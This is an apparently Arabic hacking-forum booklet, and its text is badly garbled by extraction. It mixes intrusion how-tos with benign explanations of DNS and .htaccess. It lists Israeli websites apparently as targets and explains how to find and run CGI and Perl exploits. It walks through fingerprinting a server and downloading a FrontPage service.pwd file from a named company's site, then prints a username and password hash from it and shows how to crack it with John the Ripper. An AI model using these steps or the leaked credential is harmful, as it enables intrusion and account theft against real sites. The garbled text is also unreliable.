ﺘﻪﺘﺜﻤﺎرا تﻟﺜﻐ ﺮا ت ﻣﻠﻔﺎ تاﻟﺴﻲ ﺟﻲ آي ﺳﻜ ﺮﯾﺒ ﺖ ﺷﻮ فاﻷرﺷﯿ ﻒ ﻫﺬا وﻫﻮﻟﻐ ﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰ ﻣﺜ ﻞ ﻫﺬهاﻹﺳ
ﺘﺜﻤﺎرـ Exploitأواﻹﺳ ﺘﻘﺪ وﻟﻜﻦ ﻣﺎ ﯾﻬﻢﻷﻧﻨﺎ ﻧﺒ ﺤﺚ ﻋﻦاﻟ روﺳﯿﻪأﻋ
/http://www.secure.f2s.com/eng_ver/bugs
ـ /http://www.securiteam.com ﺘ ﺞ ﻣﺜﻼ وﺗ ﻀﻌﻪﻓﻲ ﻣ ﺤ ﺮكاﻟﺒ ﺤﺚﻟ وﻣﻤﻜﻦﺗﺄ ﺧﺬإﺳﻢاﻟﻤﻨ
ﺘ ﺮهـ ﺳﯿﻜﯿﻮرﺗﻲﻓﻮﻛ ﺲﻓﻬﻲ ﻣﻔﯿﺪه ﺟﺪاأﻧﺎ ﺷﺎرﻛ ﺖ ﻣﻦﻗﺒ ﻞﻓ ﺘ ﺮكﻓﻲاﻟﻘﺎﺋﻤﻪاﻟﺒ ﺮﯾﺪهﻟ ﺘﺎﺋ ﺞ ،أوﺗﺸ وﺗﺸﻮ فاﻟﻨ
ـﺜﻐ ﺮا تاﻟﺴﻲ ﺟﻲ آي ﺳﻜ ﺮﺑ ﺖ ،ﯾﻌﻨﻲاﻣﻦ وا ﺧﺒﺎر وﻛ ﻞ ﺷﺊ ﺘﺼﻪﻓﻲاﻷﻣﻦ وﻟﯿ ﺲﻟ وﺟﺪاأﻋﺠﺒ ﺖﺑﻬﺎ وﻫﻲ ﻣﺨ
ﺘﺴﻬﯿ ﻞ ﻋﻤﻠﯿﻪ ....وﯾﻮﺟﺪﺑ ﺮﻧﺎﻣ ﺞﺗﻘﺪﻣﻪ ﺳﯿﻜﯿﻮرﺗﻲﻓﻮﻛﺴﻲﺑﺈﺳﻢ ﺳﯿﻜﯿﻮرﺗﻲﻓﻮﻛ ﺲﺑﯿﺠ ﺮ ،ﻫﻮﺑ ﺮﻧﺎﻣ ﺞﻟ
اﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻷ ﺧﺒﺎر ووو...اﻟ ﺦ
ـ CGIScripts
ﺘﺜﻤﺎرا ت ﻏﯿ ﺮاﻟ
-ﺗﻄﻮﯾ ﺮهﺑ ﺤﯿﺚ ﯾﺼﺒﺢ ﯾﺒ ﺤﺚ ﻋﻠﻰإﺳ
٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/http://www.achla.co.il
http://www.reshet.co.il/data/index.vs?dw=1
/http://www.maven.co.il
/http://www.tapuz.co.il
/http://www.walla.co.il
http://www.info.gov.il/find.pl
ﺘﻘﻨﻬﺎ
ﺘﻲ ﯾ
ﺘﺨﺪماﻟﻠﻐﻪاﻟ
ﻗﻊ ،ﯾﺴاﻟﻤﻬﻢ ﻋﻠﻰﻛ ﻞ ﺷﺨ ﺺ ﻣﻨﺎأن ﯾﺼﻠﺢﻓ ﺮزﻟﻠﺒﯿﺎﻧﺎ تاﻟﻤﻮﺟﻮدهﻓﻲﻫﺬهاﻟﻤﻮا
ﻟﯿﺼﻨﻊﺑ ﺮﻧﺎﻣ ﺞ ﯾﺼﻠﺢﻓ ﺮز وﯾ ﻀﻌﻬﺎﻓﻲ ﻣﻠ ﻒﺗﻜﺴ ﺖﺑﺪوناﺷﯿﺎ ءﺛﺎﻧﯿﻪ ﻣﻌﻬﺎ
ﺘﻢاﻟﺸﺒﻚ ﻣﻊ
ﺘ ﺞ ،ﻣﺜﻼ ، /w3-msqlاﻟﻄ ﺮﯾﻘﻪ ﺳﻬﻠﻪ ﺟﺪا ،أوﻻ ﯾ
اﻟﻌﻤﻠﯿﻪاﻟﺜﺎﻧﯿﻪﻫﻲاﻟﺒ ﺤﺚﻓﯿﻬﺎﻛﻠﻬﺎ ﻋﻦ ﻣﻨ
ﺛﻢ ﯾ ﺮﺳ ﻞﻟﻪأﻣ ﺮ ، GETﻣﺜﻼﺗ ﺮﺳ ﻞﻟﻠﺒ ﺮوﻛﺴﻲ
ﺑ ﺮوﻛﺴﻲ ﻣﺜﻼ proxy.isp.net.sa :8080و
Accept-Language: ar-sa
(User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98
Host: www.com.il
Proxy-Connection: Keep-Alive
١٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
إذاﻛﺎﻧ ﺖ urlﻣﺎ ﯾﺒﻐﺎﻟﻬﺎﻓﻠﺴﻔﻪ ،ﻛﻮد cوﻣﺎ ﻋ ﺮﻓ ﺖﺗﺸﻐﻠﻪأوﻗﺎﺑﻠ ﺖﻓﯿﻪأ ﺧﻄﺎ ءﻓﻤﻤﻜﻦﺗﺒ ﺤﺚ ﻋﻦﻓ ﺮﺟﻮن
ﺛﻨﺎ ﻋﻨﻬﺎﻓﻲﻛﻮﻛﺐ ـﻪ وﻟﻜﻦﺑﻠﻐﻪ perlأو Shell *.shوﻫﻮاﻟﺬي ﯾﻘﺎﺑ ﻞ Batchﻓﻲ وﯾﻨﺪوز وﺗ ﺤﺪ ﺛﺎﻧﻲﻟ
ـ exploitﺑﻠﻐﻪ ﺘﺐ perl exploit.plإذاﻛﺎناﻟ ﺘﯿ ﻒﺑﯿ ﺮ لأﻛ ﻟﻐﺎ تاﻟﺒ ﺮﻣﺠﻪ ،ﻣﻦاﻟﺪوسﺑﻌﺪ ﻣﺎﺗﺜﺒ ﺖأﻛ
ﺘﻌﻠﯿﻘﺎ ت (:ﺘﻮﺑﻪﺑﯿﻦ ﻋﻼﻣﺎ تاﻟ ﺑﯿ ﺮ ل وﻟﻜﻦ ﻃﺒﻌﺎﻓﯿﻪأﺷﯿﺎ ءﺗﻐﯿﯿ ﺮﻫﺎﻓﻲاﻟﻜﻮد ﻧﻔﺴﻪ ،وﻫﺬهاﻷﺷﯿﺎ ءﺗﻜﻮن ﻣﻜ
ﺘﻮاﺟﻪ ﻣﺸﺎﻛ ﻞإذا ﻣﺎﺗﻌ ﺮ ف ﺷﺊﻓﻲﺑﯿ ﺮ ل ،ﻓﻲ ﻫﺬهاﻟﻨﺎ ﺣﯿﻪ ﻻﺗﻄﻠﺐ ﺷ ﺮ حﺑﺎﻟﺼﻮر (:إذا رﺟﻊﻟﻚ رد وأﻛﯿﺪﺑ
ﺛﻢ ﻣﺴﺎﻓﻪ وإﺳﻢاﻟﻤﻠ ﻒ ﻣﺜﻼ perl ﻃﻮﯾ ﻞ ﻣﺎﻗﺪر تﺗﻘ ﺮاه ﻣﻤﻜﻦﺗ ﺤﻔﻆاﻟﺨ ﺮج ﻋﻦ ﻃ ﺮﯾ ﻖ ﻋﻼﻣﺔ > و
exploit.pl > log.htm
ﺘﺐﻓﻲاﻹ ﺻﺪارأرﺑﻌﻪ ـ Exploitﻛ ﺘﯿ ﻒﺑﯿ ﺮ لﻓﻘﻂﺗﻮاﺟﻪﻓﯿﻪ ﻣﺸﺎﻛ ﻞ ،ﻷنﺑﻌ ﺾاﻟ ﺘ ﺞأﻛ
وﺑﺎﻟﻨﺴﺒﻪﻟﻠﻤﻨ
ﺘﻐﯿ ﺮاﻟﻤﻔﺴ ﺮ ﻋﻨﺪكأوﺗﻌﺪ لﻓﻲاﻟﻜﻮد ﺘﺎﯾ ﻒﺑﯿ ﺮ لﻟﺬﻟﻚﻗﺪﺗ ﻀﻄ ﺮﻟ وﻣﻤﻜﻦ ﺧﻤﺴﻪ وﻣﻤﻜﻦ ﻣﺎ ﯾﻌﻤ ﻞ زﯾﻦﻓﻲأﻛ
ﺘﺎزوﻫﺬاﻛﻠﻪ ﯾﻄﻠﺐ ﺧﺒ ﺮهﻓﻲاﻟﻠﻐﻪ ،وﻋﻠﻰﻓﻜ ﺮهﻟﯿﻮﻧﻜ ﺲ )أﻋﻤ ﻞ ﻋﻠﻰ ( RedHat 6.2ﻓﯿﻪ ﻣﻔﺴ ﺮﺑﯿ ﺮ ل ﻣﻤ
ﺘﯿ ﻒﺑﯿ ﺮ لﺑﻌﺸ ﺮا تاﻟﻤ ﺮا ت...
ﺟﺪااﻓ ﻀ ﻞ ﻣﻦأﻛ
١١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐmarwan911:
$$$$$$$$$$$$$$$$
...
ﻃﯿﺐ
ﻗﻊ
اﻟ ﺤﯿﻦ ﻋﻨﺪﻧﺎ ﻣﻮ
ﻗﻊ http://www.netcraft.net
ﻋﻨﺪكاﻟﻤﻮ
اد ﺧﻠﻪ
ﻗﻲ ﻣ ﺮﺑﻊ
ﺗﻼ
http://uptime.netcraft.com/up/graph....whitehouse.org
ﺘﺎﻟﻲ
را ح ﯾﻄﻠﻊﻟﻨﺎاﻟ
ﺘﯿﻦ
ﺘﯿﻦ ﻣﻬﻤ
اﻟ ﺤﯿﻦ ﻋ ﺮﻓﻨﺎ ﻣﻌﻠﻮﻣ
١٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺣﻠﻮ
او ل ﺷﻲ ء ﻧﺠ ﺮبﺛﻐ ﺮا ت IIS5.0ﻋﻠﯿﻪ )را حا ﺣﻄﻬﺎﺑﻌﺪاﻟﻤﻮ ﺿﻮ ع(إذا ﻣﺎﻧﻔﻊ ﺷﻲ ء ﻧﺸﻮ فﺛﻐ ﺮا ت ﻧﻈﺎم
ﻗﻊﺑﻌﺪاﻟﻤﻮ ﺿﻮ ع( وﯾﻨﺪوز ) ٢٠٠٠را حا ﺣﻂاﻟﻤﻮ
ﻃﯿﺐﻟﻮﻛﺎناﻟﺴﯿ ﺮﻓ ﺮاﺑﺎﺗﺸﻲ؟
ﻗﻊاراﻧﻚ arank.com.www
ﺧﻠﻮﻧﺎ ﻧﺎ ﺧﺬ ﻣﺜﺎ ل ﻣﻮ
ﺘﺎﻟﯿﺔ
ﺘﯿﺠﺔاﻟ
ﻟﻮ ﺣﻠﻠﻨﺎهﺑﺎﻟﻨﯿ ﺖﻛ ﺮاﻓ ﺖ را ح ﻧﺸﻮ فاﻟﻨ
اﻟ ﻤﻠﻘﻢ وﻫﻮ apache 1.3.20و دﻋﻢﻓ ﺮوﻧ ﺖﺑﯿ ﺞ FrontPage/5.0.2.2510وﻫﺬه ﻣﻠﯿﺎﻧﺔﺛﻐ ﺮا ت
واﻟﺜﺎﻟﺚاﻟﻨﻈﺎم وﻫﻮ Linux
ﻃﯿﺐ
اﻟﻤﻠﻘﻢ
١٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺎﺟﻬﺎ ﻏﯿ ﺮه ﻣﺎﻣﻨﻪﻓﺎﯾﺪة
ﻣﻨﻬﺎ ﻣﺠﻠﺪ _ vti_pvtو _privateﻫﺬهاﻟﻠﻲ ﻧ ﺤ
ﻗﻊاﻟﻤﻮﺟﻮدة
ﻃﯿﺐﻟﻮﻗﺪرﻧﺎ ﻧﻨﺰ ل وا ﺣﺪ ﻣﻦاﻟﻤﻠﻔﺎ ت ﻫﺬه )ﻣﻼ ﺣﻈﺔاﻟﺜﻐ ﺮة ﻫﺬه ﻣﻮﺟﻮدة ب %٧٠ﻣﻦاﻟﻤﻮا
ﻗﻲاﻟﺴﻄ ﺮ ﻫﺬا ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل
ﺘ ﺤﻬﺎﺑﺎﻟﻤﻔﻜ ﺮة وﻧﻼ
ﻋﺎﻟﻨ ﺖ(ﻟﻮ ﻧﺰﻟﻨﺎﻫﺎ ﻧﻔ
goodyco:CalXS8USl4TGM
ﻗﻊﻗﻮدي http://www.goody.com.sa/_vti_pvt/service.pwd
وﻫﺬا ﻣﻦ ﻣﻮ
ﺘﺐاﻟﺴﻄ ﺮ
ﺘﺢاﻟﺪوس وﺗ ﺮو حﻟﻤﺠﻠﺪ ﺟﻮﻫﻦ وﺗﻜ
ﺗﻨﺰﻟﻪ وﺗ ﺤﻂاﻟﻤﻠ ﻒاﻟﻤﺸﻔ ﺮ )ﻣﻊاﻟﯿﻮزر(ﺑﻤﺠﻠﺪ وا ﺣﺪ وﺗﻔ
ﺘﺎﻟﻲ john -i PASSWORD.FILE اﻟ
ﺘﻨﺎه ﯾﻄﻠﻊﻟﻚاﻟﺒﺎﺳ ﺲ
وﻋﺎداﺳ
ﺛﻐ ﺮا تاﻛﺜ ﺮ
ﻟﻜﻦﻟﯿﻨﻜ ﺲاﯾ ﺶ؟ﻓﯿﻪ رﯾﺪ ﻫﺎ ت و ﻣﺎﻧﺪرﯾﻚ وﻓﯿﻪ ﻣﻨﻪإﺻﺪار تﻛﺜﯿ ﺮ و
ﺘﯿﻦ
ﻟﻜﻦ ﻫﻨﺎ را حﺗﻮاﺟﻬﻚ ﻣﺸﻜﻠ
ﻗﻊ ﯾﻄﻠﻊﻟﻚاﻟﻨﻈﺎمﻓﻮ ق
ﺘﺐ ﻋﻨﻮاناﻟﻤﻮ
او ل ﺷﻲ ء ﻣﻌ ﺮﻓﺔاﻟﻨﻈﺎمﺗﻘﺪرﺗﻄﻠﻌﻪ ﻣﻦاﺑﺪا وﺗﺸﻐﯿ ﻞ و ل telnetواﻛ
ﻧﻮﻋﻪ وإﺻﺪارﺗﻪ
================
١٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺐ ﻣﺜﻼ )ﻓﻮ قﺑﺎﻟﻤ ﺮﺑﻊاﻟﻠﻲ ﻋﺎﻟﯿﻤﯿﻦ( IISاو ﻗﻊ ﻣﻔﯿﺪ ﺟﺪاﺗﻜ
/http://neworder.box.skﻫﺬااﻟﻤﻮ
ﺘﺪى وا ﺻﺪارﺗﻪاوايﺑ ﺮﻧﺎﻣ ﺞ وﯾﻄﻠﻊﻟﻚﺛﻐ ﺮاﺗﻪ
apacheاو ﻣﻨ
١٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐACID BURN_EG :
$$$$$$$$$$$$$$$$$$$
ـ DNS؟؟؟
ﻣﺎ ﻫﻮاﻟ
==============
ﺘﺼ ﻞ ﺳ ﺮﻓ ﺮا ل DNSﻋﺎدة ﻋﻠﻰﺑﻮر ت
ﺘﺼﺎرﻟﻜﻠﻤﻪ Domain Name Systemﻮ ﯾ: DNSﻫﻮا ﺧ
ﺘﺼ ﻞﺑﻪ ﻋﻦ ﻗﻊﻓﺴﻮ فﺗ ﺘﻌﻤﻠ ﺖا ل DNSﻟﻬﺬااﻟﻤﻮ ﻗﻊ واﺳ ٥٣ﻣﻤﺎ ﯾﻌﻨﻰاﻧﻚاذاارد تاﻻﺗﺼﺎ لﻷ ﺣﺪاﻟﻤﻮا
ﺘ ﺮﺟﻢاو ﯾ ﺤﻮ لا ل translates alphabetical hostnamesﻮ ﯾﻌﻨﻰ ﻃ ﺮﯾ ﻖاﻟﺒﻮر ت ٥٣و ﺳﻮ ف ﯾ
ﻗﻊ ﻣﺜ ﻞ http://www .3asfh.com/ :ﺎﻟﻰ IP ADRESSESﻣﺜ ﻞ ,١١١٫١١١٫١١١ اﺳﻢاﻟﻤﻮ
ﺘ ﺤﻮﯾ ﻞ ﻫﺬهﺗﺴﻤﻰ ﻗﻊ ﻣﺒﺎﺷ ﺮه و ﻋﻤﻠﯿﻪاﻟ ﺘﺼ ﻞﺑﺎﻟﻤﻮ ﺘﻢاﻟﻌﻤﻠﯿﻪﺗ ١١١واﻟﻌﻜ ﺲ ﺻ ﺤﯿﺢ و ﻋﻨﺪﻣﺎﺗ
ﺘﻄﯿﻊاﻻﺗﺼﺎ لﺑﻪ ،و ﻗﻊ ﺎﻟﻰ IPﺎواﻟﻌﻜ ﺲﻟﻨﺴ address resolutionﺎىﺗ ﺤﻮﯾ ﻞاوﺗ ﺤﻠﯿ ﻞ ﻋﻨﻮاناﻟﻤﻮ
ﻗﺒ ﻞ ﻇﻬﻮرا ل DNSﻛﺎناﺳﻢا ﺧ ﺮﻟﻌﻤﻠﯿﻪا ل address resolution .ﻮﻟﻜﻦﻗﺪ ﻇﻬ ﺮا ل DNSﻟﺠﻌ ﻞ
ﻗﻊ و ﺣﻔﻈﻬﺎاﻛﺜ ﺮ ﺳﻬﻮﻟﺔ وﻣ ﺮوﻧﺔ ﻣﻦ ذيﻗﺒ ﻞ ﺣﯿﺚﻗﺒ ﻞ ﻇﻬﻮر ﻫﺬهاﻟﺨﺪﻣﺔﻓﺎﻧﻚﻟﻠﺪ ﺧﻮ ل ﺗﺬﻛ ﺮ ﻋﻨﺎوﯾﻦاﻟﻤﻮا
ﺘﻌﻤ ﻞﻟﻪ ﻗﻊﻟﻠﺪ ﺧﻮ لاﻟﯿﻪ وﻛﺎناﻻﺳﻢاﻟﻤﺴ ﺘﺎﺑﺔا ل ip addressﻟﻬﺬااﻟﻤﻮ ﻗﻊ ﻣﻌﯿﻦ ﯾﺠﺐ ﻋﻠﯿﻚﻛ ﻟﻤﻮ
ﺘﻜﻮن ﻣﻦ ﻣﻠ ﻒاﺳﻤﻪا ل HOST FILEﻮﻛﺎن ﻋﺒﺎره ﻗﺒ ﻞا ل DNSﻛﺎن ﯾ address resolution
ﺘﻪﺘﻮﻟﻰ رﻋﺎﯾ ﻗﻊ و ﻋﻨﻮاوﯾﻦا ل IPﺎﻟﺨﺎ ﺻﻪﺑﻬﻢ وﻛﺎن ﻫﺬااﻟﻤﻠ ﻒﺗ ﺘ ﺲاىاﻟﻤﻮا ﻋﻦاﺳﻤﺎ ءاﻟﻬﻮﺳ
Stanford Research Institute's Network Information Center (SRI-NIC).ﻮ
ﻛﺎن ﻋﻠﻰ ﻫﺬااﻟ ﺮاﻋﻰ ﺎن ﯾﺠﺪ ث ) (UPDATEﺎﻟﺠﺪو ل ﻫﺬا ﺣﻮاﻟﻰﻛ ﻞاﺳﺒﻮ ع و ﯾﻤﺪهﺑﺎﻟﻌﻨﺎوﯾﻦاﻟﺠﺪﯾﺪه و
ﺘﻢادﻣﯿﻦان ﯾﺠﺪد ﻫﻮاﻻ ﺧ ﺮ ﻣﻠﻔﻪاو ﻋﻦ ﻃ ﺮﯾ ﻖاﺗﺼﺎ ل ﺎ ل FTPﺑﯿﻨﻪ و ﺘﻰ ﻇﻬ ﺮ ت و ﻋﻠﻰاﻟﺴﯿﺴ ﻗﺎماﻟﺎﻻر
ﺘ ﺮة ﻣﻦاﻟﺰﻣﻦ رأوﻓﻲان ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ ﻏﯿ ﺮه ﻣﺠﺪﯾﺔ وﻏﯿ ﺮﻓﻌﺎﻟﺔ وﻣﻊ ﺑﯿﻦﻟ ﺮاﻋﻰاى SRI-NIC.وﺑﻌﺪﻓ
ﺘ ﺮﻧ ﺖﻛ ﻞ ذﻟﻚأدىاﻟﻰ ﻇﻬﻮر ا ل DNSﻟﯿﻔﻌ ﻞ ذﻟﻚ. ﺗﻄﻮر ﺧﺪﻣﺔاﻻﻧ
ﺘ ﺤﻜﻢﻓﻰﻛ ﻞ ﻮا ل DNSﻟﯿ ﺲﻟﻪ ﻣ ﺮﻛﺰاى decentralizedﺎىاﻧﻪﻟﯿ ﺲﻫﻨﺎﻛﻤﻜﺎن ﻣﻌﯿﻦاو ﻧﻈﺎم ﻣﻌﯿﻦ ﯾ
ا ل DNSﺑ ﻞﺑﺎﻟﻌﻜ ﺲﻓﺎ ل DNSﻋﺒﺎره ﻋﻦﻗﺎﻋﺪةﺑﯿﺒﺎﻧﺎ ت ﻣﻮزﻋﻪﺑﺸﻜ ﻞ ﻣﻨﻈﻢ وﺗﻮﺟﺪ ﻋﻠﻰأﻣﺜ ﺮﻣﻦ ﺳﯿ ﺮﻓ ﺮ
وﻛ ﻞ ﺳﯿ ﺮﻓ ﺮ ﻋﻠﯿﻪ DNSﯾﻌ ﺮ فاﯾﻦ ﯾﺒ ﺤﺚ ﻋﻨﺪﻣﺎ ﯾ ﺮﯾﺪان ﯾ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻌﻠﻮﻣﻪ ﻣﻌﯿﻨﻪاوﻫﻮﺳ ﺖ ﻣﻌﯿﻦاو
ﯾ ﺮﯾﺪﺗﺴﺠﯿ ﻞﻟﺪوﻣﯿﻦ ﺟﺪﯾﺪ .
ﺘﻬﺎ ...
ﻫﺬهﻛﺎﻧ ﺖ ﻣﻘﺪﻣﺔ ﻣﺒﺴﻄﺔ ﻋﻦﻫﺬهاﻟﺨﺪﻣﺔ واﻫﻤﯿ
١٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺼﻔ ﺤﻚ.
ﻗﻊ ﻣﻦاﻟﺴ ﺮﻓ ﺮﻟﯿﻌ ﺮ ﺿﻬﺎﻟﻚﻓﻰ ﻣ ﺎﻟﻤﻮ
ﻗﻊاﻟﺬىﺗﻄﻠﺒﻪ
ﺘﺼﻔ ﺤﻚ ﻋﻦاﻟﻤﻮ
ـ daemon programﻓﻰ ﺟﺪاوﻟﻪاىﻓﻰ ذاﻛ ﺮه ﻣ ﻮﻗﺒ ﻞ ﻫﺬا ﺳﯿﺴﺄ لاﻟ
ﺘﻢاﻟﻌﻤﻠﯿﻪ.
ﺘﻘ ﻞاﻟﻰ ﻣﺎ ﺳﺒ ﻖ ﺷ ﺮ ﺣﻪ وﻫﻜﺬاﺗ
ﻓﺄذاﻟﻢ ﯾﺠﺪه ﯾﻨ
ﻗﻊ ﻫﺬااﻟﺪوﻣﯿﻦ ؟
ﻗﻊاوﺗ ﺤﺪﯾﺪ ﻣﻮ
ـ DNSﻓﻲاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻟﻤﻮ
ﺘﻰ ﯾﻔﺸ ﻞاﻟ
ﻣ
======================================
أﺗﻤﻨﻰانﺗﻜﻮناﻻﺟﺎﺑﺔﻗﺪ وﺻﻠ ﺖﻷﻓﻬﺎﻣﻜﻢﻗﺒ ﻞانأذﻛ ﺮﻫﺎ وﻫﻲاﻣﺎاﻓﻲ ﺣﺎﻟﺔ ﻋﺪم وﺟﻮدﻫﺬااﻟﺪوﻣﯿﻦ
ﺘﻰ ﯾﺼ ﻞﻟﻠﺠﺬز ROOTوﯾﺒ ﺤﺚﻓﻲﻛ ﻞاﻻيﺑﯿﺎ ت ﺑﺎﻻﺻ ﻞ وﺳﯿﻄﻮ لاﻟﺒ ﺤﺚ ﻻﻧﻬﺎ ﺳﯿﺒ ﺤﺚﻓﻲﻛ ﻞاﻟﻤ ﺮا ﺣ ﻞ ﺣ
ﺘﻤ ﺮ
ﻗﺪ ﯾﺴ ﺘﻜﻮناﻻﺟﺎﺑﺔ address could not be foundو أواﻟﺪوﻣﯿﻨﺎ تاﻟﻤﺨﺰﻧﺔﻓﯿﻪ وﻣﻦﺛﻢ ﺳ
اﻟﺒ ﺤﺚ ﻣﺎ ﯾﻘﺎرب ٢٠ – ١٥ﺛﺎﻧﯿﺔ
اﻟ ﺤﺎﻟﺔاﻷ ﺧ ﺮى :
ﺘﺼﻔ ﺤﻚﺑﻘﺪاناﻻﺗﺼﺎ ل ﻣﻊا ل DNSﺎى ﻋﻤﻠﯿﻪTIMED OUT . ﺘﯿﺠﻪ ﻃﻮ لاﻟﺒ ﺤﺚﻓﯿﻘﻮم ﻣ ﻧ
ﺘﺼﻔ ﺤﻚ ...
ﺘﺼﻔﺢ ﻋﻠﻰ REFRESHﺎو RELOADﻃﺒﻌﺎ ﺣﺴﺐ ﻣ ﻮﻓﻰ ﻫﺬهاﻟ ﺤﺎﻟﻪ ﻧ ﻀﻐﻂﻓﻰاﻟﻤ
١٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐBSD-r00t :
$$$$$$$$$$$$$$
..... htaccess
ـﺔــ
* ﻣﻘﺪﻣ
------------
ﻗﻊ
ﻗﻊ واﻏﻼ قﺑﻌ ﺾاﻻﺟﺰا ءﻓﯿﻪﺑﻜﻠﻤﺔ ﺳ ﺮ ،و ﻣﻨﻊﺑﻌ ﺾاﻟﻨﺎس ﻣﻦ د ﺧ ﻞاﻟﻤﻮ ﻣﻦاﻫﻢ وﺳﺎﺋ ﻞ ﺣﻤﺎﯾﺔاﻟﻤﻮا
ﺘﺨﺪاماﻟﻤﻠ ﻒ htaccess.واﻟﺬي ﯾﻤﻜﻦ ﻋﻤ ﻞاﻟﻜﺜﯿ ﺮ واﻟﻜﺜﯿ ﺮﺑﻪ . واﻟﺴﻤﺎ حﻟﻐﯿ ﺮﻫﻢﺑﺎﻟﺪ ﺧﻮ ل ..ﻫﻮاﺳ
و ﻫﺬااﻟﻤﻠ ﻒ ﻣﺨﻔﻲ و ﻣ ﺤﻤﻲﺑﻜﻠﻤﺔ ﺳ ﺮ .
*اﻫﻤﯿﺔ ﻣﻠ ﻒ htaccess.
-----------------------
-١ﺣﻤﺎﯾﺔاي ﺟﺰ ءﻓﯿﻪﺑﻜﻤﻠﺔ ﺳ ﺮ
-٢ﻋﻤ ﻞ ﺻﻔ ﺤﺎ ت errorﺧﺎﺻﺔﺑﻚ
ﺘﻮﯾﺎ تاﻟﻤﺠﻠﺪاﻟﺬي ﻻ ﯾﻮﺟﺪﺑﻪ index -٣ﻣﻨﻊ ﻋ ﺮ ض ﻣ ﺤ
ﻗﻊ ﻻﺷﺨﺎ ص ﻣﻌﯿﻨﺔ -٤ﻣﻨﻊ/اﺗﺎ ﺣﺔ د ﺧﻮ لاﻟﻤﻮ
ﺘﺪادا ت ﻏﯿ ﺮ .. html , .asp. -٥ﺟﻌ ﻞ ﺻﻔ ﺤﺔاﻟﺒﺪاﯾﺔﺑﺄﻣ
ﺘﺢﻟﯿﻨﻚﻟﻠﯿﻨﻚا ﺧ ﺮ -٦ﺗ ﺤﻮﯾ ﻞ ﻣﻦ ﯾ ﺤﺎو لﻓ
*ﻛﯿﻔﯿﺔ ﻋﻤ ﻞ ﻣﻠ ﻒ htaccess.
---------------------------
ﯾﻤﻜﻨﻚ ﻋﻤ ﻞ ﻫﺬااﻟﻤﻠ ﻒﺑﻮاﺳﻄﻪاي ﻣ ﺤ ﺮر ﻧﺼﻮ ص ﻣﺜ ﻞاﻟﻨﻮ تﺑﺎد " "Notepadﻋﻦ ﻃ ﺮﯾ ﻖ ﻋﻤ ﻞﻟﻠﻤﻠ ﻒ
ﺘﺪاده txt.ايانﻟﯿ ﺲ ﻫﻨﺎكاﺳﻢ ﺣﻔﻆﺑﺎﺳﻢ و ﻧ ﺤﻔﻆاﻟﻤﻠ ﻒﺑﻬﺬااﻻﺳﻢ htacces.ﻋﻠﻰان ﯾﻜﻮنﻟﯿ ﺲاﻣ
ﺘﻨﺼﯿ ﺺﻓﻲاﺳﻢاﻟﻤﻠ ﻒ . - ﺘﻲاﻟ
ﺘﻄﯿﻊ ذﻟﻚا ﺣﻔﻆاﻟﻤﻠ ﻒﺑﺎﺳﻢ " - "htaccess.ﻋﻼﻣ ﻟﻠﻤﻠ ﻒ ،اذاﻟﻢﺗﺴ
١٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
* ﻋﻤ ﻞ ﺻﻔ ﺤﺎ ت errorﺧﺎ ﺻﺔ
------------------------
ﻗﻊ ﻗﻊ ﯾﻈﻬ ﺮﺑﺸﻜ ﻞاﻓ ﻀ ﻞﻛﻤﺎاﻧﻪ ﻋﻨﺪ ﻣ ﺤﺎوﻟﺔاي ﺷﺨ ﺺ ﻋﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰاﻟﻤﻮ واﻟﻔﺎﺋﺪة ﻣﻨﻬﺎﻫﻮاناﻟﻤﻮ
ﺘﻄﺒﯿ ﻖﻛ ﻞﺛﻐ ﺮه
ﻗﻊﺑﻪﻛ ﻞاﻟﺜﻐ ﺮا ت و ذﻟﻚ ﻻن ﻃ ﺮﯾﻘﺔ ﻋﻤ ﻞاﻟﺴﻜﺎﻧ ﺮ ﻫﻲاﻧﻪ ﯾﻘﻮمﺑ ﺳﻮ ف ﯾﻈﻬ ﺮانﻛﺎناﻟﻤﻮ
ﺘﯿﺠﻪ . ﻗﻊ و ﯾ ﺮ ﺻﺪاﻟﻨﻋﻠﻰاﻟﻤﻮ
ﻗﻊ ﻋﻠﯿﻪﻫﺬهاﻟﺜﻐ ﺮه . ﻓﺎذاﻛﺎنﻫﻨﺎكايﺗﻐﯿ ﺮ ﯾﻈﻬ ﺮﻟﻚﻛﺄناﻟﻤﻮ
و ﯾﻤﻜﻨﻚ ﻋﻤ ﻞ ﺻﻔ ﺤﺎ تا ل errorاﻟﺨﺎﺻﻪ ك ﻋﻦ ﻃ ﺮﯾ ﻖ -:
أ-ﺗﺼﻤﯿﻢ ﺻﻔ ﺤﺎ تا ل errorاوﻻ
ﻗﻊ ب-ﺗ ﺤﻤﯿ ﻞاﻟﺼﻔ ﺤﺎ ت ﻋﻠﻰاﻟﻤﻮ
ﺘﺎﺑﻲﻓﻲاﻟﻤﻠ ﻒ htaccess. ج-ا ﺿﺎﻓﻪاﻟﺴﻄ ﺮاﻟﻜ
ErrorDocument error_num
directory_file
